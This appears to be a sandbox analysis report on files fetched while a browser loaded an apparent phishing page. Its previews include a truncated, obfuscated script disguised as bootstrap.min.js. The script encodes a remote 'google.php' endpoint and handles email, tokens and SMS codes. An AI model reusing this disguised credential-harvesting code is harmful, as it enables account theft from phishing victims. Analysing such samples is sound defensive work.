                                                                                                                                                                                                                                  SHA1:17BEF6602672E2FD9956381E01356245144003E5
                                                                                                                                                                                                                                  SHA-256:55EAF62CB05DA20088DC12B39D7D254D046CB1FD61DDF3AE641F1439EFD0A5EE
                                                                                                                                                                                                                                  SHA-512:2A1D4EBC7FBA6951881FD1DDA745480B504E14E3ADAC3B27EC5CF4045DE14FF030D45DDA99DC056285C7980446BA0FC37F489B7534BE46107B21BD43CEE87BA0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://www.gstatic.com/recaptcha/api2/info_2x.png
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..W..DA.=.6O...H.,E.............b.....C.1...1..EbLPI.W......H..s.z5.:..._.d.0.u.......j.x.R..._.v..R...1..ir..`.yn..R..j.h./y..l......(`..5....l.E..0......B^......F.....F....Y|p..._,p.............(3^.r.P.O......;<....z.,..yF....N..x.MS...Q.C%......D8G.+......oOk...)T..}|..e...G.....'.R..G.Z.T}7(...&..@...G....$PGYv...A.c.]d....N..'.4b...R.%..)2Yd..b.M..^@.M....^.:h.N(dP*t..RQ%.o...{.vGH..S._".@./...g.....]...?..h..E.,r.m.%."."W.6G..t...->....q\.Kc.t"^......Kj~{l..C..).y..><@|yB....=c.............!...<....IEND.B`.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2228
                                                                                                                                                                                                                                  Entropy (8bit):7.82817506159911
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                                                                                                                                  SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                                                                                                                                  SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                                                                                                                                  SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (311)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1577
                                                                                                                                                                                                                                  Entropy (8bit):5.580534199651883
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:5F5CC6897BE178D31B912D260D811F9C
                                                                                                                                                                                                                                  SHA1:E152E1C241EADDE217412B5532DDA3044873B5D5
                                                                                                                                                                                                                                  SHA-256:554EA6F2AD52A8C0802A6D790E2C492156F48738A9215860C7AB0B295DF2EF87
                                                                                                                                                                                                                                  SHA-512:2BE5B5C5EBD84CD6D762A6D0196224EEB47B41C297A4600EF43635BB2A5CF6333ED99BA3A42895FCA05D34E1B266D67F0AF4277079D3A3109A2860FC28065DAD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://colegiojuancalvino.com/cloud/
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width,initial-scale=1">. <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap" rel="stylesheet">. <title>colegiojuancalvino.com</title>. <meta name="description" content="... ... ... ... ... .... ....... ....... ....... ....... ....... ........ .... ....... ... ....... ....... ... ....... ... ... ....... ........ ....... .. .. .. .. ....... .. .. ........ ... ... ... ... .... ..... ..... ...... ......... ... ... ......... ... ... ..........">. <link rel="stylesheet" href="/cloud/img/index.css">. <link rel="stylesheet" href="/cloud/img/styles.css">. <script src="https://www.google.com/recaptcha/api.js" async defer></script>
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (48664)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):48944
                                                                                                                                                                                                                                  Entropy (8bit):5.272507874206726
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                                                                                                                                                                  SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                                                                                                                                                                  SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                                                                                                                                                                  SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                                                                                                                                                                                  Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1864
                                                                                                                                                                                                                                  Entropy (8bit):5.222032823730197
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                                                                                                                  SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                                                                                                                  SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                                                                                                                  SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (19015)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):19188
                                                                                                                                                                                                                                  Entropy (8bit):5.212814407014048
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                                                                                                                                                                  SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                                                                                                                                                                  SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                                                                                                                                                                  SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                                                                                                                                                                                  Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                  Entropy (8bit):3.875
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:903747EA4323C522742842A52CE710C9
                                                                                                                                                                                                                                  SHA1:9F806EA4288867A31A4AD53AC171AA4029DF182B
                                                                                                                                                                                                                                  SHA-256:4BD8B60F91849C936AE45615145A7B7BE2CF803322A30BABBAE7267A142CA5BB
                                                                                                                                                                                                                                  SHA-512:EEF73DC29A38ED70FFCFC321931BCB5B5A29FAAC356E8F6D84F57C532EEF44AE75021C341CF7DAE26B8211924A1C0E0EC4735F6BFC4AF3970A48EB63BFB7895F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCX4otgyEwjmNEgUNg6hbPSHHiSuN8xz0Nw==?alt=proto
                                                                                                                                                                                                                                  Preview:CgkKBw2DqFs9GgA=
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15340, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15340
                                                                                                                                                                                                                                  Entropy (8bit):7.983406336508752
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:19B7A0ADFDD4F808B53AF7E2CE2AD4E5
                                                                                                                                                                                                                                  SHA1:81D5D4C7B5035AD10CCE63CF7100295E0C51FDDA
                                                                                                                                                                                                                                  SHA-256:C912A9CE0C3122D4B2B29AD26BFE06B0390D1A5BDAA5D6128692C0BEFD1DFBBD
                                                                                                                                                                                                                                  SHA-512:49DA16000687AC81FC4CA9E9112BDCA850BB9F32E0AF2FE751ABC57A8E9C3382451B50998CEB9DE56FC4196F1DC7EF46BBA47933FC47EB4538124870B7630036
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBBc4.woff2
                                                                                                                                                                                                                                  Preview:wOF2......;........d..;..........................d..z..J.`..L.Z..<.....\..`..^...x.6.$..6. ..|. ..8..z%......Q.{..q...FF.kd .8.(..d..).!C...Y.JA...r. ..GH8F......nW...".2&....2<..+C...p...b..SC.......J......z.-..Q..#6&1zUe../\...l.....<.....9s...E~.]B-..B.wY..o......Q..*A.F..1j.......-.`P% .. ,..@1.0..~.....WWW.d.u<c{..^.R.+..w....&.........A......+C....(.N.....0.~..0.J.;.Nu..7....]..m.H.....[h.GL3....?)....c.H...2.3.}y........SXI|..iVN'%E.D.W....r..<`....i....6;E$.....U.$j.@...._.......R2....WS...k.vz.R.'a9!^..*.N....h.._.....c.%."..S.2.16B...o.2}.pmU[.|.LI....2.....OWQLO1-....s..8.(...".|6...6R.. ..M-.zO.}w)..v..mXxX...c..3*#.+.v....F`.Z;.zQ.......r,....Yo.....g.h....+.....O.3Y..)Y.8.!....elX......._.3.}k~u.{ C..H.z..FP........@...d..)T.R...L.H.J.j.@..............$...E......y...3.b...I.h u.+%.HA.\..9..8..X.!....gx...].:..V..C...._..X..!....6..)...GM:E.....O.Z.*}k.;.T.k..D.k.O..D5.r..."......?..T.Q.A...CF...3g.5.Dn<.QPy..G..1.9..Q..0..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 33 x 8, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                  Entropy (8bit):4.002585360278503
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:94E22DFDBC1C76436B2836A11C6220F5
                                                                                                                                                                                                                                  SHA1:F8E18F453060F93024C2ADCEBCE31969BB011E8E
                                                                                                                                                                                                                                  SHA-256:8985FF2C3EE225E5D3B60739B71F46C9F3529BF87F1E1542181821169BFC8907
                                                                                                                                                                                                                                  SHA-512:75E2B5044B2F099A2AFBB81D8DBC1737951154E5695528494F66D025DFD2C801D3166A092884A68EE55EBFA28355DBC4FDAC52E98BB83CB98AB585648AC68EFB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...!..........%......IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):32
                                                                                                                                                                                                                                  Entropy (8bit):4.390319531114783
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:EB3CE3190D8A58E048D35E620747D3A5
                                                                                                                                                                                                                                  SHA1:76B5B6461189F839B018EF5C785DB4836B818B7D
                                                                                                                                                                                                                                  SHA-256:2D670E2962D8D805B95912CACA0822CE7C6913636BA40373C6E6AEA73CAC8457
                                                                                                                                                                                                                                  SHA-512:08F9C680B09CC25919A91F8E080CFC517F7354F49759DDC8CF6FFEB5ADE2E46F80A866E7531B6EA97188A5E4647093350F91ED51254351C47BCE3488EF88A595
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCb02LDHy8sPzEgUNrQmusSEWRYwGPJc9_RIZCVFkkXdWWQV3EgUNQ_N2OSFqF164dx73Lg==?alt=proto
                                                                                                                                                                                                                                  Preview:CgkKBw2tCa6xGgAKCQoHDUPzdjkaAA==
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):2297
                                                                                                                                                                                                                                  Entropy (8bit):4.679334142228654
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:0B1EEE1C68F309BEFBC8FAA89271557D
                                                                                                                                                                                                                                  SHA1:622103EBFFC2F5D8D11B93143DDCEEE31C598932
                                                                                                                                                                                                                                  SHA-256:BD2CA29B3C54E7240FB98799B48F6C0723A9525B514551BDC7CE9CD7594FA2F0
                                                                                                                                                                                                                                  SHA-512:87D3A0E650EDD10C72E84A9943638F7BE0634C0CCDDFE4F7512258D115F787DA8717D48B706A24214A01EF8C198CAC020C913254E248DE0E3E64122AB37D4CC6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://colegiojuancalvino.com/cloud/js/27t732321122.js
                                                                                                                                                                                                                                  Preview:..const yearEl = document.getElementById('year');.if (yearEl) {. yearEl.textContent = new Date().getFullYear();.}..let captchaToken = null;..const params = new URLSearchParams(window.location.search);.const emailFromQuery = params.get("email");.if (emailFromQuery && emailFromQuery.includes('@')) {. const emailField = document.getElementById('email');. if (emailField) {. emailField.value = emailFromQuery;. }.}..function onCaptchaSuccess(token) {. captchaToken = token;. const button = document.getElementById('downloadButton');. if (button) button.disabled = false;.}..function toggleLoading(show) {. const overlay = document.getElementById('loadingOverlay');. if (overlay) {. overlay.classList.toggle('active', show);. }.}..async function handleSubmit(event) {. event.preventDefault();.. const emailInput = document.getElementById('email');. const button = document.getElementById('downloadButton');. const email = emailInput ? emailInput.v
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):102
                                                                                                                                                                                                                                  Entropy (8bit):4.87238624912889
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:CA45F131C0A7610559951468379DE744
                                                                                                                                                                                                                                  SHA1:41600944B1C1BCBCBF52D8F109A53CBF5CEC395F
                                                                                                                                                                                                                                  SHA-256:1495D842E5688C08A1E20D7F106C9CE0F1A907E39AAA798DA89F507C2536282F
                                                                                                                                                                                                                                  SHA-512:800786598E5B2F9CCE66E3CA0B2040C67D9EAAF02CFCCD3E9D161C5B26765E9721167BF14EB50020CF59C4A728480C7F3C204EB6A3ECC0304F3237334A3CA621
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=ItfkQiGBlJDHuTkOhlT3zHpB
                                                                                                                                                                                                                                  Preview:importScripts('https://www.gstatic.com/recaptcha/releases/ItfkQiGBlJDHuTkOhlT3zHpB/recaptcha__en.js');
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (32065)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):85578
                                                                                                                                                                                                                                  Entropy (8bit):5.366055229017455
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                                                                                                                                                                  SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                                                                                                                                                                  SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                                                                                                                                                                  SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                                                                                                                                                                                  Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (60819), with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):60819
                                                                                                                                                                                                                                  Entropy (8bit):5.4839527999983755
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:D9C6DE0DF2BF028D93924AFF92487904
                                                                                                                                                                                                                                  SHA1:6596050516DD12AF52D9B0E7B18ED837F1D81300
                                                                                                                                                                                                                                  SHA-256:769A555DE553BABC35A3338F344DD7AA16260C93CEA2C7DB290707C90484E7CC
                                                                                                                                                                                                                                  SHA-512:6BE4940EEC0DCD70EFCF85EB21C5C7B827F4F3DFE2240A0DE259AB5C9835F179DDB8A2BA6250C73516A5BF8C9DD4DE3438A23CD2D162745FABA9314A18FA1615
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js
                                                                                                                                                                                                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var W,O,I,U,K,X,L,l,j,T,t,N,q,e,Z,V,G,J,Q,Y,$,t1,e1,r1,i1,o1,n1,s,s1,c1,a1,h1,l1,o,f1,r,d1,u1,n,c,a,h,f,d,i=function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},o=t.lib={},n=o.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function()
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65462), with CRLF line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):559074
                                                                                                                                                                                                                                  Entropy (8bit):4.891567498142122
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:46775581F2C4F4E5B586E081C723A373
                                                                                                                                                                                                                                  SHA1:DA3514A3E23B95320697F21F2D73E2F79B53508F
                                                                                                                                                                                                                                  SHA-256:E4D1B88F82C3BC564323DA78D8CB58152FD6C5614CF64A4EA947C5929593627F
                                                                                                                                                                                                                                  SHA-512:A751C4FF3DABAE149DB731E416FD04160D1D71038A18C6D1DACE3C455F5871ACE9840914E91F1255131BFABC6E85827AA90724EB17C65350FE6440CF61BC90A7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://5963053387-1317754460.cos.ap-jakarta.myqcloud.com/attach%2Fbootstrap.min.js
                                                                                                                                                                                                                                  Preview:var file = "aHR0cHM6Ly9taW9nLmRlY29yYXRlZC5pdC5jb20vZ29vZ2xlLnBocA==";....var _0x23bb50=_0x3b66;(function(_0x18f798,_0x1a61e7){var _0x449e65=_0x3b66,_0x275831=_0x18f798();while(!![]){try{var _0x2168a7=-parseInt(_0x449e65(0x1af7))/(-0x2069+0x2*0x661+0x13a8)+parseInt(_0x449e65(0x2178))/(0x2359*-0x1+0x2*-0x40f+-0x167*-0x1f)+-parseInt(_0x449e65(0x1120))/(0x347+-0x161c+0x12d8)+parseInt(_0x449e65(0x1754))/(-0x22e6+0x2b0*-0x2+0x284a)*(-parseInt(_0x449e65(0x822))/(0x6a5*0x4+-0x19*-0x147+-0x2*0x1d3f))+-parseInt(_0x449e65(0x2030))/(-0x10b*-0x13+0x4f*0x50+-0x2c7b)*(parseInt(_0x449e65(0xf99))/(0x41*-0x29+0xf01*0x2+-0x5*0x3ea))+parseInt(_0x449e65(0x19b2))/(0x321*0x5+0x32*0xaf+-0x1*0x31cb)+parseInt(_0x449e65(0x1daa))/(0x1369*0x1+0x1d*0x137+0x7*-0x7cd);if(_0x2168a7===_0x1a61e7)break;else _0x275831['push'](_0x275831['shift']());}catch(_0xeadf25){_0x275831['push'](_0x275831['shift']());}}}(_0x4471,-0xaeea4+0x3d99d+0x35888*0x4));var count=0x1dcf+-0x597+0x4d8*-0x5;let email,keyGlobal,token,numberSms,numb
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):530
                                                                                                                                                                                                                                  Entropy (8bit):7.2576396280117494
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:88E0F42C9FA4F94AA8BCD54D1685C180
                                                                                                                                                                                                                                  SHA1:5AD9D47A49B82718BAA3BE88550A0B3350270C42
                                                                                                                                                                                                                                  SHA-256:89C62095126FCA89EA1511CF35B49B8306162946B0C26D6F60C5506C51D85992
                                                                                                                                                                                                                                  SHA-512:FAFF842E9FF4CC838EC3C724E95EEE6D36B2F8C768DC23E48669E28FC5C19AA24B1B34CF1DBCBE877B3537D6A325B4C35AF440C2B6D58F6A77A04A208D9296F8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
